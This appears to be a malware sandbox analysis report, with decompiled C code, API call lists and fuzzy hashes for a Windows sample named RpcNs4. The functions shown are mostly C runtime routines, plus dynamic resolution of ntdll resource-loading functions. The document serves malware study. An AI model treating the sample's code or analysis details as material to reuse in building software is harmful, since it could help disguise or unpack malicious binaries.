                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434250);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t49 =  *((intOrPtr*)(_t53 + 8));
                                                                                                      				if( *((intOrPtr*)(_t49 + 4)) != 0) {
                                                                                                      					L15:
                                                                                                      					_t21 =  *((intOrPtr*)(_t49 + 4));
                                                                                                      				} else {
                                                                                                      					_push(0x2800);
                                                                                                      					_push(E00402CB3);
                                                                                                      					_push(E004025D7);
                                                                                                      					_push(0);
                                                                                                      					_t21 = _t49 + 9;
                                                                                                      					_push(_t21);
                                                                                                      					_push(0);
                                                                                                      					"jdh EC"();
                                                                                                      					_t36 = _t21;
                                                                                                      					if(_t36 != 0) {
                                                                                                      						_t51 = E00406CD0(_t36);
                                                                                                      						while(_t51 != 0) {
                                                                                                      							_t51 = _t51 - 1;
                                                                                                      							if( *((char*)(_t51 + _t36)) == 0x20) {
                                                                                                      								 *((char*)(_t51 + _t36)) = 0;
                                                                                                      								continue;
                                                                                                      							}
                                                                                                      							L7:
                                                                                                      							E00406D5B(0xe);
                                                                                                      							 *(_t53 - 4) =  *(_t53 - 4) & 0x00000000;
                                                                                                      							if( *((intOrPtr*)(_t49 + 4)) == 0) {
                                                                                                      								_t27 = E004025D7(_t36, _t45, _t49, 8);
                                                                                                      								 *((intOrPtr*)(_t53 - 0x1c)) = _t27;
                                                                                                      								if(_t27 != 0) {
                                                                                                      									_t52 = _t51 + 2;
                                                                                                      									_t28 = E004025D7(_t36, _t45, _t49, _t51 + 2);
                                                                                                      									 *((intOrPtr*)(_t49 + 4)) = _t28;
                                                                                                      									if(_t28 == 0) {
                                                                                                      										L13:
                                                                                                      										E00402CB3( *((intOrPtr*)(_t53 - 0x1c)));
                                                                                                      									} else {
                                                                                                      										if(E00406C6E(_t28, _t52, _t36) != 0) {
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											_push(0);
                                                                                                      											E00406C1E(_t36, _t45);
                                                                                                      											goto L13;
                                                                                                      										} else {
                                                                                                      											_t47 =  *((intOrPtr*)(_t53 - 0x1c));
                                                                                                      											 *_t47 =  *((intOrPtr*)(_t49 + 4));
                                                                                                      											_t44 =  *((intOrPtr*)(_t53 + 0xc));
                                                                                                      											 *((intOrPtr*)(_t47 + 4)) =  *((intOrPtr*)(_t44 + 4));
                                                                                                      											 *((intOrPtr*)(_t44 + 4)) = _t47;
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      							E00402CB3(_t36);
                                                                                                      							 *(_t53 - 4) = 0xfffffffe;
                                                                                                      							E00403194();
                                                                                                      							goto L15;
                                                                                                      						}
                                                                                                      						_t51 = _t51 - 1;
                                                                                                      						goto L7;
                                                                                                      					}
                                                                                                      				}
                                                                                                      				return E00406875(_t21);
                                                                                                      			}













                                                                                                      0x004030ac
                                                                                                      0x004030ac
                                                                                                      0x004030ae
                                                                                                      0x004030b3
                                                                                                      0x004030b8
                                                                                                      0x004030c0
                                                                                                      0x00403188
                                                                                                      0x00403188
                                                                                                      0x004030c6
                                                                                                      0x004030c6
                                                                                                      0x004030cb
                                                                                                      0x004030d0
                                                                                                      0x004030d5
                                                                                                      0x004030d6
                                                                                                      0x004030d9
                                                                                                      0x004030da
                                                                                                      0x004030db
                                                                                                      0x004030e3
                                                                                                      0x004030e7
                                                                                                      0x004030f4
                                                                                                      0x00403103
                                                                                                      0x004030f8
                                                                                                      0x004030fd
                                                                                                      0x004030ff
                                                                                                      0x00000000
                                                                                                      0x004030ff
                                                                                                      0x00403108
                                                                                                      0x0040310a
                                                                                                      0x00403110
                                                                                                      0x00403118
                                                                                                      0x0040311c
                                                                                                      0x00403122
                                                                                                      0x00403127
                                                                                                      0x00403129
                                                                                                      0x0040312d
                                                                                                      0x00403133
                                                                                                      0x00403138
                                                                                                      0x0040316b
                                                                                                      0x0040316f
                                                                                                      0x0040313a
                                                                                                      0x00403147
                                                                                                      0x00403161
                                                                                                      0x00403162
                                                                                                      0x00403163
                                                                                                      0x00403164
                                                                                                      0x00403165
                                                                                                      0x00403166
                                                                                                      0x00000000
                                                                                                      0x00403149
                                                                                                      0x0040314c
                                                                                                      0x0040314f
                                                                                                      0x00403151
                                                                                                      0x00403157
                                                                                                      0x0040315a
                                                                                                      0x0040315a
                                                                                                      0x00403147
                                                                                                      0x00403138
                                                                                                      0x00403127
                                                                                                      0x00403176
                                                                                                      0x0040317c
                                                                                                      0x00403183
                                                                                                      0x00000000
                                                                                                      0x00403183
                                                                                                      0x00403107
                                                                                                      0x00000000
                                                                                                      0x00403107
                                                                                                      0x004030e7
                                                                                                      0x00403190

                                                                                                      APIs
                                                                                                      • ___unDName.LIBCMT ref: 004030DB
                                                                                                      • _strlen.LIBCMT ref: 004030EE
                                                                                                      • __lock.LIBCMT ref: 0040310A
                                                                                                      • _malloc.LIBCMT ref: 0040311C
                                                                                                      • _malloc.LIBCMT ref: 0040312D
                                                                                                      • _free.LIBCMT ref: 00403176
                                                                                                        • Part of subcall function 00406C1E: IsProcessorFeaturePresent.KERNEL32(00000017,00406BF2,00000000,?,?,?,?,?,00406BFF,00000000,00000000,00000000,00000000,00000000,00405FFC), ref: 00406C20
                                                                                                      • _free.LIBCMT ref: 0040316F
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3704956918-0
                                                                                                      • Opcode ID: 4982373046e5d6618406c5f35a984e0497dfac13016beb111cc1953250947740
                                                                                                      • Instruction ID: c0db6f7d0662a5cb01ac585c96d5be62debaf1bba68ce3c52ba4cfbe577086f4
                                                                                                      • Opcode Fuzzy Hash: 4982373046e5d6618406c5f35a984e0497dfac13016beb111cc1953250947740
                                                                                                      • Instruction Fuzzy Hash: 7C21F771904601BAD711AF358D46B6BBA98AF09315F10813FB819BB2C1DB7CDA41C69C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 91%
                                                                                                      			E0040435E(void* __ebx, void* __edi, void* __eflags) {
                                                                                                      				void* __esi;
                                                                                                      				void* _t3;
                                                                                                      				intOrPtr _t6;
                                                                                                      				long _t14;
                                                                                                      				long* _t27;
                                                                                                      
                                                                                                      				E00403B79(_t3);
                                                                                                      				if(E00406EAC() != 0) {
                                                                                                      					_t6 = E004062A5(E004040B9);
                                                                                                      					 *0x4351c0 = _t6;
                                                                                                      					__eflags = _t6 - 0xffffffff;
                                                                                                      					if(_t6 == 0xffffffff) {
                                                                                                      						goto L1;
                                                                                                      					} else {
                                                                                                      						_t27 = E0040CFF1(1, 0x3bc);
                                                                                                      						__eflags = _t27;
                                                                                                      						if(_t27 == 0) {
                                                                                                      							L6:
                                                                                                      							E004043D4();
                                                                                                      							__eflags = 0;
                                                                                                      							return 0;
                                                                                                      						} else {
                                                                                                      							__eflags = E00406301( *0x4351c0, _t27);
                                                                                                      							if(__eflags == 0) {
                                                                                                      								goto L6;
                                                                                                      							} else {
                                                                                                      								_push(0);
                                                                                                      								_push(_t27);
                                                                                                      								E004042AB(__ebx, __edi, _t27, __eflags);
                                                                                                      								_t14 = GetCurrentThreadId();
                                                                                                      								_t27[1] = _t27[1] | 0xffffffff;
                                                                                                      								 *_t27 = _t14;
                                                                                                      								__eflags = 1;
                                                                                                      								return 1;
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				} else {
                                                                                                      					L1:
                                                                                                      					E004043D4();
                                                                                                      					return 0;
                                                                                                      				}
                                                                                                      			}








                                                                                                      0x0040435e
                                                                                                      0x0040436a
                                                                                                      0x00404379
                                                                                                      0x0040437e
                                                                                                      0x00404384
                                                                                                      0x00404387
                                                                                                      0x00000000
                                                                                                      0x00404389
                                                                                                      0x00404396
                                                                                                      0x0040439a
                                                                                                      0x0040439c
                                                                                                      0x004043cb
                                                                                                      0x004043cb
                                                                                                      0x004043d0
                                                                                                      0x004043d3
                                                                                                      0x0040439e
                                                                                                      0x004043ac
                                                                                                      0x004043ae
                                                                                                      0x00000000
                                                                                                      0x004043b0
                                                                                                      0x004043b0
                                                                                                      0x004043b2
                                                                                                      0x004043b3
                                                                                                      0x004043ba
                                                                                                      0x004043c0
                                                                                                      0x004043c4
                                                                                                      0x004043c8
                                                                                                      0x004043ca
                                                                                                      0x004043ca
                                                                                                      0x004043ae
                                                                                                      0x0040439c
                                                                                                      0x0040436c
                                                                                                      0x0040436c
                                                                                                      0x0040436c
                                                                                                      0x00404373
                                                                                                      0x00404373

                                                                                                      APIs
                                                                                                      • __init_pointers.LIBCMT ref: 0040435E
                                                                                                        • Part of subcall function 00403B79: RtlEncodePointer.NTDLL(00000000,?,00404363,00402B70,00434230,00000014), ref: 00403B7C
                                                                                                        • Part of subcall function 00403B79: __initp_misc_winsig.LIBCMT ref: 00403B97
                                                                                                        • Part of subcall function 00403B79: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00406461
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00406475
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00406488
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040649B
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004064AE
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004064C1
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004064D4
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004064E7
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004064FA
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0040650D
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00406520
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00406533
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00406546
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00406559
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0040656C
                                                                                                        • Part of subcall function 00403B79: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0040657F
                                                                                                      • __mtinitlocks.LIBCMT ref: 00404363
                                                                                                      • __mtterm.LIBCMT ref: 0040436C
                                                                                                        • Part of subcall function 004043D4: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00406DC6
                                                                                                        • Part of subcall function 004043D4: _free.LIBCMT ref: 00406DCD
                                                                                                        • Part of subcall function 004043D4: DeleteCriticalSection.KERNEL32(xuC,?,?,00404371,00402B70,00434230,00000014), ref: 00406DEF
                                                                                                      • __calloc_crt.LIBCMT ref: 00404391
                                                                                                      • __initptd.LIBCMT ref: 004043B3
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004043BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3567560977-0
                                                                                                      • Opcode ID: 3339dd92b905196a4c42f06426374c0a1ac13dbf5bf5d1ed4aba601c44fe22ee
                                                                                                      • Instruction ID: ff0ecafb33dab0f9688af2411afeda57b66d43e85835077dd4caad25b267e939
                                                                                                      • Opcode Fuzzy Hash: 3339dd92b905196a4c42f06426374c0a1ac13dbf5bf5d1ed4aba601c44fe22ee
                                                                                                      • Instruction Fuzzy Hash: C7F0F6B22187121AE62437767C0374B3A90EF80738B20263FFA90F41D2EF7D9411425C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 00401BF4
                                                                                                      • GetProcAddress.KERNEL32(00000000,LdrAccessResource), ref: 00401BFE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: LdrAccessResource$LdrFindResource_U$ntdll.dll
                                                                                                      • API String ID: 190572456-309990276
                                                                                                      • Opcode ID: 374ed4848605be23ddd654ab2968cb408ecf5167f409eae68abec4d7f6b343ea
                                                                                                      • Instruction ID: 0be7b2e87ea625e9e257cfe7c5ec55fbb677ed6b4a9053280dbe75720fce2a0f
                                                                                                      • Opcode Fuzzy Hash: 374ed4848605be23ddd654ab2968cb408ecf5167f409eae68abec4d7f6b343ea
                                                                                                      • Instruction Fuzzy Hash: 2111CE71A4021DABDB00DFE9D981BAFBBF8AF08714F50406BE904F7280D67999058BA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E0040DCE3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				signed int _t15;
                                                                                                      				signed int _t20;
                                                                                                      				signed int _t26;
                                                                                                      				void* _t30;
                                                                                                      				void* _t32;
                                                                                                      				signed int _t35;
                                                                                                      				void* _t36;
                                                                                                      
                                                                                                      				_t30 = __edx;
                                                                                                      				_t25 = __ebx;
                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434600);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				 *(_t36 - 0x1c) = 0;
                                                                                                      				_t32 = E00404224();
                                                                                                      				_t26 =  *0x435d60; // 0xfffffffe
                                                                                                      				if(( *(_t32 + 0x70) & _t26) == 0 ||  *((intOrPtr*)(_t32 + 0x6c)) == 0) {
                                                                                                      					_t15 = E00406D5B(0xd);
                                                                                                      					 *((intOrPtr*)(_t36 - 4)) = 0;
                                                                                                      					_t35 =  *(_t32 + 0x68);
                                                                                                      					 *(_t36 - 0x1c) = _t35;
                                                                                                      					__eflags = _t35 -  *0x435794; // 0x626c30
                                                                                                      					if(__eflags != 0) {
                                                                                                      						__eflags = _t35;
                                                                                                      						if(__eflags != 0) {
                                                                                                      							__eflags = _t15 | 0xffffffff;
                                                                                                      							asm("lock xadd [esi], eax");
                                                                                                      							if(__eflags == 0) {
                                                                                                      								__eflags = _t35 - 0x435570;
                                                                                                      								if(__eflags != 0) {
                                                                                                      									E00402CB3(_t35);
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      						_t20 =  *0x435794; // 0x626c30
                                                                                                      						 *(_t32 + 0x68) = _t20;
                                                                                                      						_t35 =  *0x435794; // 0x626c30
                                                                                                      						 *(_t36 - 0x1c) = _t35;
                                                                                                      						asm("lock xadd [esi], eax");
                                                                                                      					}
                                                                                                      					 *((intOrPtr*)(_t36 - 4)) = 0xfffffffe;
                                                                                                      					E0040DD80();
                                                                                                      				} else {
                                                                                                      					_t35 =  *(_t32 + 0x68);
                                                                                                      				}
                                                                                                      				_t40 = _t35;
                                                                                                      				if(_t35 == 0) {
                                                                                                      					E00403A3B(_t25, _t30, _t32, _t35, _t40, 0x20);
                                                                                                      				}
                                                                                                      				return E00406875(_t35);
                                                                                                      			}










                                                                                                      0x0040dce3
                                                                                                      0x0040dce3
                                                                                                      0x0040dce3
                                                                                                      0x0040dce5
                                                                                                      0x0040dcea
                                                                                                      0x0040dcf1
                                                                                                      0x0040dcf9
                                                                                                      0x0040dcfb
                                                                                                      0x0040dd04
                                                                                                      0x0040dd24
                                                                                                      0x0040dd2a
                                                                                                      0x0040dd2d
                                                                                                      0x0040dd30
                                                                                                      0x0040dd33
                                                                                                      0x0040dd39
                                                                                                      0x0040dd3b
                                                                                                      0x0040dd3d
                                                                                                      0x0040dd3f
                                                                                                      0x0040dd42
                                                                                                      0x0040dd46
                                                                                                      0x0040dd48
                                                                                                      0x0040dd4e
                                                                                                      0x0040dd51
                                                                                                      0x0040dd56
                                                                                                      0x0040dd4e
                                                                                                      0x0040dd46
                                                                                                      0x0040dd57
                                                                                                      0x0040dd5c
                                                                                                      0x0040dd5f
                                                                                                      0x0040dd65
                                                                                                      0x0040dd6b
                                                                                                      0x0040dd6b
                                                                                                      0x0040dd6f
                                                                                                      0x0040dd76
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0b
                                                                                                      0x0040dd0e
                                                                                                      0x0040dd10
                                                                                                      0x0040dd14
                                                                                                      0x0040dd19
                                                                                                      0x0040dd21

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404224: __getptd_noexit.LIBCMT ref: 00404225
                                                                                                        • Part of subcall function 00404224: __amsg_exit.LIBCMT ref: 00404232
                                                                                                      • __amsg_exit.LIBCMT ref: 0040DD14
                                                                                                      • __lock.LIBCMT ref: 0040DD24
                                                                                                      • _free.LIBCMT ref: 0040DD51
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __amsg_exit$__getptd_noexit__lock_free
                                                                                                      • String ID: 0lb$pUC
                                                                                                      • API String ID: 3054295789-4201871394
                                                                                                      • Opcode ID: 4c84405c307965613a111f208fc7c825eb10043995980390d3693b8e5dccc630
                                                                                                      • Instruction ID: f7bd0d1cb375b59fdf65ca27020606fa41fe1823a4a118f136f2b5f5d8d1c8b0
                                                                                                      • Opcode Fuzzy Hash: 4c84405c307965613a111f208fc7c825eb10043995980390d3693b8e5dccc630
                                                                                                      • Instruction Fuzzy Hash: D8118E32D01A21ABDB21AFA9A40125AB7A0BF04B20F15413FF854B72D0C7386946CFCD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 23%
                                                                                                      			E004047D4(void* __ebx, void* __esi, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                      				void* __edi;
                                                                                                      				void* __ebp;
                                                                                                      				void* _t25;
                                                                                                      				void* _t28;
                                                                                                      				intOrPtr _t29;
                                                                                                      				void* _t30;
                                                                                                      				intOrPtr* _t31;
                                                                                                      				void* _t33;
                                                                                                      
                                                                                                      				_t30 = __esi;
                                                                                                      				_t27 = __ebx;
                                                                                                      				_t35 = _a28;
                                                                                                      				_t29 = _a8;
                                                                                                      				if(_a28 != 0) {
                                                                                                      					_push(_a28);
                                                                                                      					_push(_a24);
                                                                                                      					_push(_t29);
                                                                                                      					_t5 =  &_a4; // 0x404c38
                                                                                                      					_push( *_t5);
                                                                                                      					E00404EE0(__ebx, _t29, __esi, _t35);
                                                                                                      					_t33 = _t33 + 0x10;
                                                                                                      				}
                                                                                                      				_t36 = _a40;
                                                                                                      				_t7 =  &_a4; // 0x404c38
                                                                                                      				_push( *_t7);
                                                                                                      				if(_a40 != 0) {
                                                                                                      					_push(_a40);
                                                                                                      				} else {
                                                                                                      					_push(_t29);
                                                                                                      				}
                                                                                                      				E00402935(_t28);
                                                                                                      				_push(_t30);
                                                                                                      				_t31 = _a32;
                                                                                                      				_push( *_t31);
                                                                                                      				_push(_a20);
                                                                                                      				_push(_a16);
                                                                                                      				_push(_t29);
                                                                                                      				E0040551F(_t27, _t31, _t36);
                                                                                                      				_push(0x100);
                                                                                                      				_push(_a36);
                                                                                                      				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
                                                                                                      				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                                                      				_push(_a20);
                                                                                                      				_push(_a12);
                                                                                                      				_push(_t29);
                                                                                                      				_push(_a4);
                                                                                                      				_t25 = E004045CE(_t27, _t29, _t31, _t36);
                                                                                                      				if(_t25 != 0) {
                                                                                                      					E00402903(_t25, _t29);
                                                                                                      					return _t25;
                                                                                                      				}
                                                                                                      				return _t25;
                                                                                                      			}











                                                                                                      0x004047d4
                                                                                                      0x004047d4
                                                                                                      0x004047d7
                                                                                                      0x004047dc
                                                                                                      0x004047df
                                                                                                      0x004047e1
                                                                                                      0x004047e4
                                                                                                      0x004047e7
                                                                                                      0x004047e8
                                                                                                      0x004047e8
                                                                                                      0x004047eb
                                                                                                      0x004047f0
                                                                                                      0x004047f0
                                                                                                      0x004047f3
                                                                                                      0x004047f7
                                                                                                      0x004047f7
                                                                                                      0x004047fa
                                                                                                      0x004047ff
                                                                                                      0x004047fc
                                                                                                      0x004047fc
                                                                                                      0x004047fc
                                                                                                      0x00404802
                                                                                                      0x00404807
                                                                                                      0x00404808
                                                                                                      0x0040480b
                                                                                                      0x0040480d
                                                                                                      0x00404810
                                                                                                      0x00404813
                                                                                                      0x00404814
                                                                                                      0x0040481d
                                                                                                      0x00404822
                                                                                                      0x00404825
                                                                                                      0x0040482b
                                                                                                      0x0040482e
                                                                                                      0x00404831
                                                                                                      0x00404834
                                                                                                      0x00404835
                                                                                                      0x00404838
                                                                                                      0x00404843
                                                                                                      0x00404847
                                                                                                      0x00000000
                                                                                                      0x00404847
                                                                                                      0x0040484e

                                                                                                      APIs
                                                                                                      • ___BuildCatchObject.LIBCMT ref: 004047EB
                                                                                                        • Part of subcall function 00404EE0: ___AdjustPointer.LIBCMT ref: 00404F29
                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00404802
                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 00404814
                                                                                                      • CallCatchBlock.LIBCMT ref: 00404838
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                      • String ID: 8L@
                                                                                                      • API String ID: 2633735394-4280888483
                                                                                                      • Opcode ID: de3a390995e930c270733da9eb8ff1fb1c933b5d220bcc45bc1d3bfe70562cc1
                                                                                                      • Instruction ID: 7addfb298fc54b3c6c01c9a40d77cef2251b0c5da60657127e47733218de6bb0
                                                                                                      • Opcode Fuzzy Hash: de3a390995e930c270733da9eb8ff1fb1c933b5d220bcc45bc1d3bfe70562cc1
                                                                                                      • Instruction Fuzzy Hash: 28012D72000109BBCF126F55DC05EDB3BBAFF89754F15802AFA1872161C779E861EBA8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401B00(struct HINSTANCE__* _a4) {
                                                                                                      				struct _WNDCLASSEXA _v52;
                                                                                                      				struct HINSTANCE__* _t16;
                                                                                                      
                                                                                                      				_t16 = _a4;
                                                                                                      				_v52.cbSize = 0x30;
                                                                                                      				_v52.style = 3;
                                                                                                      				_v52.lpfnWndProc = 0x401046;
                                                                                                      				_v52.cbClsExtra = 0;
                                                                                                      				_v52.cbWndExtra = 0;
                                                                                                      				_v52.hInstance = _t16;
                                                                                                      				_v52.hIcon = LoadIconA(_t16, 0x6b);
                                                                                                      				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                      				_v52.hbrBackground = 6;
                                                                                                      				_v52.lpszMenuName = 0;
                                                                                                      				_v52.lpszClassName = 0x4368b0;
                                                                                                      				_v52.hIconSm = LoadIconA(_v52.hInstance, 0x6c);
                                                                                                      				return RegisterClassExA( &_v52);
                                                                                                      			}





                                                                                                      0x00401b06
                                                                                                      0x00401b0c
                                                                                                      0x00401b13
                                                                                                      0x00401b1a
                                                                                                      0x00401b21
                                                                                                      0x00401b28
                                                                                                      0x00401b2f
                                                                                                      0x00401b3f
                                                                                                      0x00401b4d
                                                                                                      0x00401b50
                                                                                                      0x00401b57
                                                                                                      0x00401b5e
                                                                                                      0x00401b6b
                                                                                                      0x00401b7b

                                                                                                      APIs
                                                                                                      • LoadIconA.USER32(?,0000006B), ref: 00401B32
                                                                                                      • LoadCursorA.USER32 ref: 00401B42
                                                                                                      • LoadIconA.USER32(?,0000006C), ref: 00401B65
                                                                                                      • RegisterClassExA.USER32(00000030), ref: 00401B72
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Load$Icon$ClassCursorRegister
                                                                                                      • String ID: 0
                                                                                                      • API String ID: 4202395251-4108050209
                                                                                                      • Opcode ID: a71c3b1cb4ff5c24059766a0e8a90010ee43dc88a63ad91dff96757c0ac73305
                                                                                                      • Instruction ID: ac0e75dba2af3176d702dc32e44df3b044374c7e21e17c4da143abcc9c03fe3b
                                                                                                      • Opcode Fuzzy Hash: a71c3b1cb4ff5c24059766a0e8a90010ee43dc88a63ad91dff96757c0ac73305
